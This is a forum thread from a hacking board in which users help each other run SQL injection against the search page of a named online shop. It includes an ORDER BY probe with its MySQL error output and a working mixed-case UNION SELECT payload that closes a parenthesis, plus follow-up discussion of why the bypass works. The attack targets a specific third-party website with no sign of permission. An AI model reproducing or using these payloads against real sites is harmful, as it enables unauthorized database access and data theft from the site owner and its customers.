Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
help bypass sqli in search
Posted by: x_inject
Date: January 10, 2014 10:17AM

hey bro
can u help me

how to bypass sqli in this website

http://www.locksupermarket.co.uk/search-result.php?search=1%27 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- -
==========
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' at line 1
==========

tanks

Options: ReplyQuote
Re: help bypass sqli in search
Posted by: jammy99
Date: January 14, 2014 07:41AM

http://www.locksupermarket.co.uk/search-result.php?search=null%27%29%20UnIoN%20SeLect%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--%20-

Options: ReplyQuote
Re: help bypass sqli in search
Posted by: Freesia
Date: January 28, 2014 07:00AM

jammy99 Wrote:
-------------------------------------------------------
> http://www.locksupermarket.co.uk/search-result.php
> ?search=null%27%29%20UnIoN%20SeLect%201,2,3,4,5,6,
> 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,
> 2,3,4,5--%20-



That is a beauty, jammy99. Could you please explain this method? (1 to zero, 1 to zero etc)
Thank you

Options: ReplyQuote
Re: help bypass sqli in search
Posted by: bakie
Date: February 08, 2014 12:45PM

Nice trick, I had not ever seen that techinque,
please explain

Options: ReplyQuote
Re: help bypass sqli in search
Posted by: Net_Spy
Date: March 06, 2014 04:37AM

Nice one the only thing work is ) to close the prathensis first and validate the query and 2nd thing is your columns count . it has error based injection as well.

Regards
Net_Spy

Options: ReplyQuote
Re: help bypass sqli in search
Posted by: mklv
Date: May 12, 2014 11:07AM

why annotation must be -- - , why not # or /* thank you!

Options: ReplyQuote


Sorry, only registered users may post in this forum.